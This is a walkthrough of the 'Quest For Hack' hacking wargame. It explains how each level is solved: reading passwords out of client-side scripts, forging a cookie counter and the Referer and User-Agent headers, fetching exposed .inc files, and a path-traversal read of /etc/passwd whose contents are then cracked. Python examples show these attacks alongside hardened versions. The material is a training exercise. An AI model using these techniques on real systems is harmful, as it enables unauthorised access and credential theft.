Walkthrough for Quest For Hack


Quest For Hack is a hacking game in the spirit of Try2Hack, created by the guys from GipsHackers Crew. Here is the link: http://quest.gipshack.ru/index.htm. At the request of one of the developers, the keys are not disclosed; only the route to each of them is shown ...

Let's start from the beginning.
First you have to guess the default administrative password. Hopefully nobody had any trouble with that:

1) So, the first level. YANDEX.
As we are prompted to, we use the administration form. Then we open the source of the administration page and look at the script in it:

function test(passwd) {
    if (passwd == ...
        window.alert('ok. You hacked me');
        location.href = "

We enter the password found there and press the button, or simply follow the link given in location.href. That's it. The key to the next level is ours.

2) MICROSOFT
We look through index.html. We see the algorithm that compares the username and password, so we look for where they come from. We notice an interesting line:
SCRIPT src = logo.gif
Open this logo.gif: despite the name it is a script, and it contains the username and password. Enter them in the form, hit Enter, get the key ...
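Levels 1 and 2 are the same mistake twice: the check runs in the browser, so the expected value and the page it unlocks are readable by anyone who fetches the script, whatever file name it hides behind. The following is an added example, not code from the game or from the author; it pulls the script references out of a page and the hard-coded comparison out of a script. The HTML, the script, the placeholder password and the target page are all constructed for the example and are not the game's real values.

```python
import re

# Constructed sample HTML and script, modelled on the fragments quoted in
# levels 1 and 2; the password, URL and script names are placeholders, not
# the game's real values.
SAMPLE_HTML = """
<html><body>
<form name="adm"><input name="passwd"><input type="button" onClick="test(adm.passwd.value)"></form>
<SCRIPT src=logo.gif></SCRIPT>
<script language="JavaScript" src="check.js"></script>
</body></html>
"""

SAMPLE_JS = """
function test(passwd) {
    if (passwd == "placeholder-pass") {
        window.alert('ok. You hacked me');
        location.href = "placeholder_next.htm";
    } else {
        window.alert('wrong');
    }
}
"""

# <script ... src=logo.gif> or src="check.js": the file may have any
# extension, which is exactly the level-2 trick.
SCRIPT_SRC_RE = re.compile(r"""<script\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
# if (passwd == "...") / if (pw === '...'): a variable compared to a literal.
CMP_RE = re.compile(r"""if\s*\(\s*(\w+)\s*===?\s*(["'])(.*?)\2\s*\)""", re.S)
# The page the script jumps to on success.
HREF_RE = re.compile(r"""location\.href\s*=\s*(["'])(.*?)\1""", re.S)


def external_scripts(html):
    """Every src= of a <script> tag, whatever the file is called."""
    return SCRIPT_SRC_RE.findall(html)


def extract_client_side_check(js):
    """Return (variable, expected literal, redirect target) for the first
    hard-coded string comparison in the script, or None if there is none.
    The redirect is None when the script does not set location.href."""
    m = CMP_RE.search(js)
    if m is None:
        return None
    h = HREF_RE.search(js)
    return m.group(1), m.group(3), (h.group(2) if h else None)


if __name__ == "__main__":
    print("scripts to fetch:", external_scripts(SAMPLE_HTML))
    print("client-side check:", extract_client_side_check(SAMPLE_JS))
```

On a real page you would run `external_scripts` over the downloaded HTML, fetch each file it names (a download manager, as used later in level 6, avoids the browser's prompts), and run `extract_client_side_check` over each one; the redirect target is usually the shortcut to the next level, as the walkthrough notes.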

3) Matrix
The decoys we won't consider at all, so straight to the point. Go into the chat. Look at the source. We notice this line:
param name = movie value = "passwd.swf"
Download this Flash file. Then open it either directly in some editor (not necessarily a hex editor), or in a program that splits the SWF into its parts. I opened it in the editor (FAR). Look for the line with the word KEY ... That's it, the key is ...

4) Macromedia
Here everything is quite simple. The key is inside the Flash movie. You can download it (see above), but there is an easier way. In Opera, right-click the Flash movie and untick Loop. Right-click again and click Forward. That's it. The key is ours.

5) Sun Microsystem
Go to Downloads. Download the file sunmicro.exe. Take any resource explorer; I used the one built into ShadowScan. Look through the resources. Find the one we need and save it as a .bmp. Open it ... the key is ours.

6) NASA
As soon as we open the page, a prompt asks for a password. Take a download manager (FlashGet, say) and download this index.html. Open it in an editor (notepad). We see these lines:
login = prompt("Password protected., Enter login first:", "");
if (login ==
Go back to the page and enter whatever follows login == (without the quotes, of course). We are on the page. Here we are offered the administration form. Look at the source. We see:
input type = "reset" value = "enter here" onClick = "resultion(entr.login.value, entr.passwd.value, entr.NEWURL.value)"
So our data is passed to the resolution function, and we need to find its definition. Note the line:
script language = Javascript src = base64.js
Open that file. The resolution function is defined there. Two lines interest us: var entrance = hexcode(login); and if (password == entrance). So the password has to be the hex code of whatever we type as the login: the script compares the password against hexcode(login). I entered 49 - 31. That's it. The key is ours.
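The point of level 6 is that the expected password is computed in the browser from the login we ourselves typed, so any login works once the password field holds its encoding. The following is an added example, not the game's base64.js; it assumes that hexcode() turns each character into its two-digit hex ASCII code (consistent with the 49 / 31 pair above: '1' is decimal 49, hex 31), emulates the quoted comparison, and forges a matching pair for any login.

```python
def hexcode(s):
    """Assumed behaviour of hexcode() from base64.js: each character becomes
    its two-digit hex ASCII code, so '1' (decimal 49) -> '31'."""
    return "".join("%02x" % ord(c) for c in s)


def client_check(login, password):
    """The check quoted from base64.js:
       var entrance = hexcode(login); if (password == entrance) ..."""
    entrance = hexcode(login)
    return password == entrance


def forge_credentials(login):
    """The expected password is derived from the login we type, so any login
    passes once the password field holds its hex encoding."""
    return login, hexcode(login)


if __name__ == "__main__":
    for login in ("1", "admin"):
        user, pw = forge_credentials(login)
        print(user, pw, client_check(user, pw))
```

Whatever the real transform turns out to be, the approach is the same: read it out of the script, reimplement it, and feed the form a pair that satisfies it.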

7) FBI
On the first visit to the page we receive the following cookie:
Set-Cookie: cookietester=1
and the message: Come back again. So we do. When we refresh the page, we send:
Cookie: cookietester=1
Cookie2: $Version="1"
and receive:
Set-Cookie: cookietester=2
along with the message: You are only 1 times visit this page. Try until 3000 visits. Once more. We send:
Cookie: cookietester=2
Cookie2: $Version="1"
and receive:
Set-Cookie: cookietester=3
The point is that the cookie holds the visit counter, i.e. how many times we have visited the page, and the server takes our word for it. The line Try until 3000 visits tells us we have to come there 3000 times to get the key. Instead of doing that, we change Cookie: cookietester=2 to Cookie: cookietester=3000 and return to the page. We see: OK. The key for next level is ...
In other words, to get the key we only have to claim that we have been here 3000 times. I sent this request (working through a proxy):
GET http://quest.gipshack.ru/hackme/3/fbi/index.php HTTP/1.0
User-Agent: Opera/6.0 (Windows 2000; U) [en]
Host: quest.gipshack.ru
Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*
Accept-Language: en, en
Accept-Charset: windows-1252;q=1.0, utf-8;q=1.0; utf-16;q=1.0; iso-8859-1;q=0.6; *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Referer: http://quest.gipshack.ru/hackme/index.php
Cookie: cookietester=3000
Cookie2: $Version="1"
Pragma: no-cache
Cache-Control: no-cache
Proxy-Connection: Keep-Alive

In the response, instead of the nagging message, back comes the key ;).

8) CIA
Everything is simple. Use exactly: Mozilla/5.0 (compatible; Opera 7.01; UNIX). That is, change the value of the User-Agent: header to Mozilla/5.0 (compatible; Opera 7.01; UNIX). We get: Yor system is OK, but address, you came from, must be 212.215.125.126. So we are asked to come from 212.215.125.126. We forge the Referer: header to 212.215.125.126. Go to the page again, and there is our key %).
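Levels 7 and 8 both rely on request headers the client controls: a visit counter kept in a cookie, a User-Agent string and a Referer. The following is an added example, not the game's server code or the author's; it emulates the level-7 server as observed (the counter is read straight out of the cookie), shows the request a client can send to forge any of the three headers, and puts a hardened counter next to it that carries an HMAC under a server-side secret so a forged value is ignored. The secret, the key text and the 3000 threshold's messages are constructed placeholders.

```python
import hashlib
import hmac

TARGET = 3000
SECRET = b"server-side-secret-placeholder"              # constructed; stays on the server
KEY_TEXT = "OK. The key for next level is <placeholder>"  # constructed; not the real key


def parse_cookies(header):
    """'cookietester=2; other=x' -> {'cookietester': '2', 'other': 'x'}."""
    out = {}
    for part in (header or "").split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            out[name] = value
    return out


def visit_message(n):
    return "You are only %d times visit this page. Try until %d visits." % (n, TARGET)


def vulnerable_visit(cookie_header):
    """Level-7 server as observed: the counter lives in the cookie and is
    trusted as-is, so the client can write any number into it.
    Returns (Set-Cookie value, page text)."""
    value = parse_cookies(cookie_header).get("cookietester", "0")
    n = int(value) if value.isdigit() else 0
    if n >= TARGET:
        return "cookietester=%d" % n, KEY_TEXT
    return "cookietester=%d" % (n + 1), visit_message(n)


def counter_mac(n):
    return hmac.new(SECRET, str(n).encode(), hashlib.sha256).hexdigest()


def signed_cookie(n):
    return "cookietester=%d.%s" % (n, counter_mac(n))


def hardened_visit(cookie_header):
    """Same counter, but the value carries an HMAC under a server-side secret.
    A forged or unsigned value fails verification and the count restarts."""
    value = parse_cookies(cookie_header).get("cookietester", "")
    n = 0
    if "." in value:
        num, mac = value.rsplit(".", 1)
        if num.isdigit() and hmac.compare_digest(counter_mac(int(num)), mac):
            n = int(num)
    if n >= TARGET:
        return signed_cookie(n), KEY_TEXT
    return signed_cookie(n + 1), visit_message(n)


def build_request(path, host, cookie=None, user_agent=None, referer=None):
    """Raw HTTP/1.0 request with attacker-chosen Cookie, User-Agent and
    Referer headers: the shape of the level-7 request above and of the
    level-8 forgery."""
    lines = ["GET %s HTTP/1.0" % path, "Host: %s" % host]
    if user_agent:
        lines.append("User-Agent: %s" % user_agent)
    if referer:
        lines.append("Referer: %s" % referer)
    if cookie:
        lines.append("Cookie: %s" % cookie)
    return "\r\n".join(lines) + "\r\n\r\n"


if __name__ == "__main__":
    print(build_request("/hackme/3/fbi/index.php", "quest.gipshack.ru",
                        cookie="cookietester=3000",
                        user_agent="Mozilla/5.0 (compatible; Opera 7.01; UNIX)",
                        referer="212.215.125.126"))
    print(vulnerable_visit("cookietester=3000")[1])   # key handed out
    print(hardened_visit("cookietester=3000")[1])     # forgery ignored
```

The HMAC only stops tampering with the number; a client can still replay an old signed cookie, so a counter that matters should really be kept in server-side session state keyed by an unguessable session id. The same goes for User-Agent and Referer: they are client-supplied text and cannot authenticate anything.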

9) White House
We go in. But we do not go for the administrative login we are prompted towards, otherwise we will have to solve one more problem ;). We go straight to the user login. There we get the error message: Warning: Too many connections to database 'db_user.inc'. Try to login later !. We request db_user.inc directly in the browser and look at it. Now the same for db_admin.inc. There are our login and password. Now we boldly go to the admin login and enter the data we found. We get the key.

10) Pentagon
And so we have reached the final level ;). After poking around and clicking we notice that the user section is served by the script view.pl, whose parameter is the path to a file. Let's view the source of admin.pl. Substituting, we get:
http://gipshack.ru/cgi-bin/view.pl?path_to_file=admin.pl&Submit=View
We look. It is a fake, but a necessary one: as a hint, it shows the main operation of the script. Understand the script's logic. We see that it takes the user and password (by the game authors' design) from /etc/passwd. Let's try to get it. view.pl?path_to_file=/etc/passwd does not work. Try a relative path instead: view.pl?path_to_file=../../../etc/passwd. Now put JTR to work; in 5 minutes it cracks the password. Enter the obtained data into the admin form. It seems we have passed =)
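Why the absolute path fails while ../../../etc/passwd works is worth seeing in code. The following is an added example, not the game's view.pl; it assumes that view.pl simply glues its own directory in front of the supplied name before opening it (the walkthrough only says the script's logic has to be understood, not what it is), uses an in-memory stand-in for the disk so it runs offline, and puts a hardened version beside it that resolves the path and refuses anything outside the base. It also picks out of the passwd text the entries that actually carry a hash, which is what gets handed to JTR. The directory, file contents and hash are constructed placeholders.

```python
import posixpath

CGI_BASE = "/var/www/cgi-bin"   # assumed directory view.pl runs from

# Constructed stand-in for the server's disk; contents are placeholders.
# The "quest" line carries an old-style hash in the password field, the
# shape of entry that JtR can work on (the hash itself is made up).
FAKE_FS = {
    "/var/www/cgi-bin/admin.pl": "#!/usr/bin/perl\n# placeholder for admin.pl\n",
    "/etc/passwd": (
        "root:x:0:0:root:/root:/bin/sh\n"
        "daemon:*:1:1:daemon:/usr/sbin:/bin/false\n"
        "quest:$1$saltsalt$placeholderhashvalue:1000:1000::/home/quest:/bin/sh\n"
    ),
}


def view_vulnerable(path_to_file):
    """Assumed logic of view.pl: glue the script directory in front of the
    supplied name and open the result. posixpath.normpath stands in for the
    kernel resolving '..' during open(). An absolute name ends up under the
    base and is not found; '../' segments walk out of it."""
    full = posixpath.normpath(CGI_BASE + "/" + path_to_file)
    return FAKE_FS.get(full)


def view_hardened(path_to_file):
    """Resolve first, then refuse anything that lands outside the base."""
    full = posixpath.normpath(posixpath.join(CGI_BASE, path_to_file))
    if posixpath.commonpath([CGI_BASE, full]) != CGI_BASE:
        return None
    return FAKE_FS.get(full)


def crackable_entries(passwd_text):
    """(user, hash) for passwd lines whose second field is a real hash rather
    than the 'x' or '*' of a shadowed or locked account: these are what gets
    fed to JtR."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[1] not in ("", "x", "*", "!"):
            found.append((fields[0], fields[1]))
    return found


if __name__ == "__main__":
    for p in ("admin.pl", "/etc/passwd", "../../../etc/passwd"):
        print("%-22s vulnerable=%-5s hardened=%s" % (
            p, view_vulnerable(p) is not None, view_hardened(p) is not None))
    print(crackable_entries(FAKE_FS["/etc/passwd"]))
```

The number of ../ segments needed depends on how deep the base directory is; one more than necessary does no harm, since the file system stops at the root. On a real server a stricter fix than the commonpath check is to resolve symlinks too (os.path.realpath) before comparing, and to serve only from a whitelist of names.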

Don't think it was all that easy. There were decoys, and there were rooms where I wanted to bang my head on the keyboard 8). These are simply the finished solutions. It is far more interesting to go through it yourself, or in company, and this article is only for those who got stuck hard on one of the levels.
Well done to the guys from GipsHackers Crew. Keep developing your project! Good luck ;).

PS
Thanks to everyone who shared this fun with us.

Author: r4ShRaY


The material is published with the permission of DHGROUP (http://www.dhgroup.org)